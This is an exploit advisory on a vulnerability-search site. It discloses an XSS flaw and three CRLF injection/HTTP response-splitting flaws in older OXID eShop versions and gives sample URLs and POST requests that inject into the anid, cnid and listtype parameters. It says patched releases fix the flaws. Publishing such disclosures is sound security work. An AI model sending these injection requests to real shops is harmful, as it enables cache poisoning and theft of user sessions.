Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities

Related Vulnerabilities: CVE-2014-2017   CVE-2014-2016  
Publish Date: 20 Mar 2014
Author: //sToRm
Source / Download Exploit 
                # Exploit Title: OXID eShop v&lt;4.7.11/5.0.11 + v&lt;4.8.4/5.1.4 Multiple Vulnerabilities 
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm 
# Author mail: storm@sicherheit-online.org
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions &lt; 4.7.11/5.0.11 + All versions &lt; 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)


###########################################################################################################
# XSS vulnerability #######################################################################################

Under certain circumstances, an attacker can trick a user to enter a specially crafted 
URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that 
theoretically can be used to gain unauthorized access to a user account or collect 
sensitive information of this user. 

SAMPLE: -------------------------------------------------------------------------------
http://HOST/tag/sample/sample-name.html?cur=2&amp;listtype=tag&amp;pgNr=2&amp;searchtag=[XSS]
---------------------------------------------------------------------------------------

Products:

    OXID eShop Enterprise Edition
    OXID eShop Professional Edition
    OXID eShop Community Edition 

Releases: All previous releases 
Platforms: All releases are affected on all platforms. 
	
STATE
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.

Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001

###########################################################################################################
###########################################################################################################





########################################################################################################### 
# Multiple CRLF injection / HTTP response splitting #######################################################

Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to 
enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability
that theoretically can be used to poison cache, gain unauthorized access to a user account or collect 
sensitive information of this user.

A possible exploit by passing such a mal-formed URI could lead to:
- return of a blank page or a PHP error (depending on one's server configuration)
- set unsolicited browser cookies 

Products:

    OXID eShop Enterprise Edition
    OXID eShop Professional Edition
    OXID eShop Community Edition 

Releases: All previous releases 
Platforms: All releases are affected on all platforms. 

STATE:
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available. 
	
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002


Vulnerability details:

########################################################################################################### 
# 1 # CRLF injection / HTTP response splitting ############################################################

PATH: ROOT/index.php
PARAMETER: anid

CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=start
&amp;aid=1
&amp;am=1
&amp;anid=%0d%0a%20[INJECT:INJECT]
&amp;cl=start
&amp;fnc=tobasket
&amp;lang=0
&amp;pgNr=0
&amp;stoken=1
-----------------------------------------------------------------------------------------------------------

SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=start&amp;aid=1&amp;am=1&amp;anid=%0d%0a%20INJECTED:INJECTED_DATA&amp;cl=start&amp;fnc=tobasket&amp;lang=0&amp;pgNr=0&amp;stoken=1
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################





###########################################################################################################
# 2 # CRLF injection / HTTP response splitting ############################################################

PATH: ROOT/index.php
PARAMETER: cnid

CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&amp;aid=1
&amp;am=1
&amp;anid=0
&amp;cl=details
&amp;cnid=%0d%0a%20[INJECTED:INJECTED]
&amp;fnc=tobasket
&amp;lang=0
&amp;listtype=list
&amp;panid=
&amp;parentid=1
&amp;stoken=1
&amp;varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------

SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&amp;aid=1&amp;am=1&amp;anid=0&amp;cl=details&amp;cnid=%0d%0a%20INJECTED:INJECTED_DATA&amp;fnc=tobasket&amp;lang=0&amp;listtype=list&amp;panid=&amp;parentid=1&amp;stoken=1&amp;varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################





###########################################################################################################
# 3 # CRLF injection / HTTP response splitting ############################################################

PATH: ROOT/index.php
PARAMETER: listtype

CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&amp;aid=1
&amp;am=1
&amp;anid=0
&amp;cl=details
&amp;cnid=0
&amp;fnc=tobasket
&amp;lang=0
&amp;listtype=%0d%0a%20[INJECTED:INJECTED]
&amp;panid=
&amp;parentid=0
&amp;stoken=0
&amp;varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------

SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&amp;aid=1&amp;am=1&amp;anid=0&amp;cl=details&amp;cnid=0&amp;fnc=tobasket&amp;lang=0&amp;listtype=%0d%0a%20INJECTED:INJECTED_DATA&amp;panid=&amp;parentid=0&amp;stoken=0&amp;varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################



Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners. 
A thanks to the developers who have responded relatively quickly.

Cheers!
//sToRm

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started